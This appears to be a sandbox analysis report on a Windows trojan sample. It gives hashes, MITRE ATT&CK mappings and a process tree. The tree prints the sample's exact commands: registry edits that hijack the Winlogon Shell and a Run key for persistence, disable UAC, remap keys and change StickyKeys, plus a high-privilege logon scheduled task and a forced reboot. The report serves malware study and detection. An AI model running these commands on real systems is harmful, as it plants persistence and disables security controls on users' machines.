ea60123ec363610c8cfcd0ad5f0ab2832934af69a3c715020a09e6d907691d4c

Analysis

max time kernel
48s
max time network
51s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
31/03/2023, 23:44

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

[email protected]
Size

315KB
MD5

9f8bc96c96d43ecb69f883388d228754
SHA1

61ed25a706afa2f6684bb4d64f69c5fb29d20953
SHA256

7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5
SHA512

550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6
SSDEEP

6144:BswDdb2MemnBVlz0SoVbO4A6OA4Trl28TyT6llY1/I8cWJWlfTXv:BswRSslz0P1OdFXJlJ8buXv

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe"	reg.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Executes dropped EXE 1 IoCs

pid	Process
4432	system.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe"	reg.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3992	SCHTASKS.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 17 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "192"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133247871078297622"	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3520	chrome.exe
3520	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3132	shutdown.exe
Token: SeRemoteShutdownPrivilege	3132	shutdown.exe
Token: SeShutdownPrivilege	3520	chrome.exe
Token: SeCreatePagefilePrivilege	3520	chrome.exe
Token: SeShutdownPrivilege	3520	chrome.exe
Token: SeCreatePagefilePrivilege	3520	chrome.exe
Token: SeShutdownPrivilege	3520	chrome.exe
Token: SeCreatePagefilePrivilege	3520	chrome.exe
Token: SeShutdownPrivilege	3520	chrome.exe
Token: SeCreatePagefilePrivilege	3520	chrome.exe
Token: SeShutdownPrivilege	3520	chrome.exe
Token: SeCreatePagefilePrivilege	3520	chrome.exe
Token: SeShutdownPrivilege	3520	chrome.exe
Token: SeCreatePagefilePrivilege	3520	chrome.exe
Token: SeShutdownPrivilege	3520	chrome.exe
Token: SeCreatePagefilePrivilege	3520	chrome.exe
Token: SeShutdownPrivilege	3520	chrome.exe
Token: SeCreatePagefilePrivilege	3520	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe
3520	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1308	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1304 wrote to memory of 4432	1304	[email protected]	85
PID 1304 wrote to memory of 4432	1304	[email protected]	85
PID 1304 wrote to memory of 4432	1304	[email protected]	85
PID 4432 wrote to memory of 3528	4432	system.exe	86
PID 4432 wrote to memory of 3528	4432	system.exe	86
PID 4432 wrote to memory of 3528	4432	system.exe	86
PID 4432 wrote to memory of 3992	4432	system.exe	87
PID 4432 wrote to memory of 3992	4432	system.exe	87
PID 4432 wrote to memory of 3992	4432	system.exe	87
PID 4432 wrote to memory of 3856	4432	system.exe	90
PID 4432 wrote to memory of 3856	4432	system.exe	90
PID 4432 wrote to memory of 3856	4432	system.exe	90
PID 4432 wrote to memory of 4180	4432	system.exe	91
PID 4432 wrote to memory of 4180	4432	system.exe	91
PID 4432 wrote to memory of 4180	4432	system.exe	91
PID 4432 wrote to memory of 4552	4432	system.exe	93
PID 4432 wrote to memory of 4552	4432	system.exe	93
PID 4432 wrote to memory of 4552	4432	system.exe	93
PID 4432 wrote to memory of 4248	4432	system.exe	94
PID 4432 wrote to memory of 4248	4432	system.exe	94
PID 4432 wrote to memory of 4248	4432	system.exe	94
PID 4432 wrote to memory of 4532	4432	system.exe	95
PID 4432 wrote to memory of 4532	4432	system.exe	95
PID 4432 wrote to memory of 4532	4432	system.exe	95
PID 4432 wrote to memory of 5012	4432	system.exe	96
PID 4432 wrote to memory of 5012	4432	system.exe	96
PID 4432 wrote to memory of 5012	4432	system.exe	96
PID 4532 wrote to memory of 3864	4532	cmd.exe	103
PID 4532 wrote to memory of 3864	4532	cmd.exe	103
PID 4532 wrote to memory of 3864	4532	cmd.exe	103
PID 4248 wrote to memory of 4816	4248	cmd.exe	105
PID 4248 wrote to memory of 4816	4248	cmd.exe	105
PID 4248 wrote to memory of 4816	4248	cmd.exe	105
PID 3856 wrote to memory of 3664	3856	cmd.exe	104
PID 3856 wrote to memory of 3664	3856	cmd.exe	104
PID 3856 wrote to memory of 3664	3856	cmd.exe	104
PID 5012 wrote to memory of 2276	5012	cmd.exe	102
PID 5012 wrote to memory of 2276	5012	cmd.exe	102
PID 5012 wrote to memory of 2276	5012	cmd.exe	102
PID 4552 wrote to memory of 4404	4552	cmd.exe	106
PID 4552 wrote to memory of 4404	4552	cmd.exe	106
PID 4552 wrote to memory of 4404	4552	cmd.exe	106
PID 4180 wrote to memory of 3796	4180	cmd.exe	107
PID 4180 wrote to memory of 3796	4180	cmd.exe	107
PID 4180 wrote to memory of 3796	4180	cmd.exe	107
PID 4432 wrote to memory of 5004	4432	system.exe	121
PID 4432 wrote to memory of 5004	4432	system.exe	121
PID 4432 wrote to memory of 5004	4432	system.exe	121
PID 5004 wrote to memory of 1376	5004	cmd.exe	123
PID 5004 wrote to memory of 1376	5004	cmd.exe	123
PID 5004 wrote to memory of 1376	5004	cmd.exe	123
PID 4432 wrote to memory of 4112	4432	system.exe	125
PID 4432 wrote to memory of 4112	4432	system.exe	125
PID 4432 wrote to memory of 4112	4432	system.exe	125
PID 3520 wrote to memory of 4592	3520	chrome.exe	127
PID 3520 wrote to memory of 4592	3520	chrome.exe	127
PID 4112 wrote to memory of 3132	4112	cmd.exe	128
PID 4112 wrote to memory of 3132	4112	cmd.exe	128
PID 4112 wrote to memory of 3132	4112	cmd.exe	128
PID 3520 wrote to memory of 2264	3520	chrome.exe	130
PID 3520 wrote to memory of 2264	3520	chrome.exe	130
PID 3520 wrote to memory of 2264	3520	chrome.exe	130
PID 3520 wrote to memory of 2264	3520	chrome.exe	130
PID 3520 wrote to memory of 2264	3520	chrome.exe	130

C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
1⤵
- Suspicious use of WriteProcessMemory
PID:1304
- C:\Users\Admin\AppData\Local\system.exe
  "C:\Users\Admin\AppData\Local\system.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
    3⤵
    PID:3528
- - C:\Windows\SysWOW64\SCHTASKS.exe
    C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:3992
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3856
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
      4⤵
      Modifies WinLogon for persistence
      PID:3664
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4180
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
      4⤵
      Adds Run key to start application
      PID:3796
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4552
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
      4⤵
      PID:4404
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4248
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
      4⤵
      PID:4816
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4532
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
      4⤵
      PID:3864
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5012
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
      4⤵
      UAC bypass
      PID:2276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5004
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
      4⤵
      PID:1376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4112
  - - C:\Windows\SysWOW64\shutdown.exe
      shutdown -r -t 10 -f
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3132

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb89669758,0x7ffb89669768,0x7ffb89669778
  2⤵
  PID:4592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1784 --field-trial-handle=1816,i,2639501677083355528,15569053669729314941,131072 /prefetch:2
  2⤵
  PID:2264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1640 --field-trial-handle=1816,i,2639501677083355528,15569053669729314941,131072 /prefetch:8
  2⤵
  PID:5100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1804 --field-trial-handle=1816,i,2639501677083355528,15569053669729314941,131072 /prefetch:8
  2⤵
  PID:3156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3232 --field-trial-handle=1816,i,2639501677083355528,15569053669729314941,131072 /prefetch:1
  2⤵
  PID:4056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3360 --field-trial-handle=1816,i,2639501677083355528,15569053669729314941,131072 /prefetch:1
  2⤵
  PID:4184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4256 --field-trial-handle=1816,i,2639501677083355528,15569053669729314941,131072 /prefetch:1
  2⤵
  PID:3252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4696 --field-trial-handle=1816,i,2639501677083355528,15569053669729314941,131072 /prefetch:8
  2⤵
  PID:2516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4664 --field-trial-handle=1816,i,2639501677083355528,15569053669729314941,131072 /prefetch:8
  2⤵
  PID:1864

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1896

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3945855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1308

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
aa74a0cd9128a94660fa49e452497692

SHA1
b9d9a6729be6d171e54ad52066a0ee6b0334e48a

SHA256
d580ce1978734d13066bc1f5fce0534b50979520dbfb2e1c4d92c5c713eaaa78

SHA512
6d3668978d1b2f9c1e579929aec5c69df5491c867656817ba2c2e0bf1da519c471462d5f9205039bdd8ca88a93bddc2def22c3968e1650c5c6c676f7053bf104

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
163313bb8fc3f0679005f0a0926da75f

SHA1
4dd986d1c6ed83a6b46f0fe29ec7bf27d7b86f80

SHA256
e50837d52b861c95f7f0c38ea410bf0f330b6353d152f64d7306b4e28f1c8ef4

SHA512
192a25d48d2bd98ec0df92eb90cdff1b244697f07e1726656186046c89b76b545a1a8cfddd51b5fb68193b7905574c9c73d962e2cb2d997a13bfb5c5d232beac

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
72KB

MD5
a3740bb8443af050a7c6fcca5ca058c2

SHA1
00d27f42ac93ccaaf57201b355de75882841075b

SHA256
94b3338886d656f0588d4ea414c3d98be6985650f1d66796ccc9617798d84ce6

SHA512
af23f46d1d18994b4ff80a6da2bd37683665f3a8a7d692e480473e019cc6de55e42a16742aa831f70376d4c9907b93a03e2ae9c89ca7698b4f30e3b6e21fc380

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
175KB

MD5
79edf7dd9630408dc6abceed0998fea2

SHA1
40ae32c0dc8bee1bda9caecc809a0767eacb8234

SHA256
f4f6ae6a6a168521ae3a34927904290ecbb0f5bb495e747d1ec4cf42b415f727

SHA512
ecbc5bb3f8aa01b1d16d3529aacc700f24f87e770c84c4a2ff834f1c8baa3035bf28396ef06502940dea96885767e35981bc212ff65def6138bc9f7861d48db7

Download Submit
C:\Users\Admin\AppData\Local\del.bat

Filesize
76B

MD5
dda69d69d2bf9994650f6c0df260fd80

SHA1
94041b483a3b0cda19339bddf09f1bd1b2242fea

SHA256
a2126c0c0b9d7401a20582ada62be413320cebb86dff164e5cb91bec7b6aa898

SHA512
7e70d053cd60110011844a699eba9a25065cdb2827fd72f379a67f479eb2ddc346223c39e3c2781dc16b8e07915737aba513b5eae57d38e88d46eae318a579ac

Download Submit
C:\Users\Admin\AppData\Local\system.exe

Filesize
315KB

MD5
a03cc01f35fea739591e25ff99a9580a

SHA1
56622df2f28dd2a857dd15c8cc72ce6edcf9dbb4

SHA256
26ca5965797b2cef0f37e9150aa463276a3bc992fd89db4eec3264447839f05e

SHA512
db76e3470fdccb77d9cc900ef3e71dd9166c5e7a820ef010e482317613790100f23ba50e1bb29633a32b886ec7656280dff3c3dea4a3e0e3bb74c5e3a1f95fe4

Download Submit
C:\Users\Admin\AppData\Local\system.exe

Filesize
315KB

MD5
a03cc01f35fea739591e25ff99a9580a

SHA1
56622df2f28dd2a857dd15c8cc72ce6edcf9dbb4

SHA256
26ca5965797b2cef0f37e9150aa463276a3bc992fd89db4eec3264447839f05e

SHA512
db76e3470fdccb77d9cc900ef3e71dd9166c5e7a820ef010e482317613790100f23ba50e1bb29633a32b886ec7656280dff3c3dea4a3e0e3bb74c5e3a1f95fe4

Download Submit
memory/1308-286-0x000002430A850000-0x000002430AB49000-memory.dmp

Filesize
3.0MB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads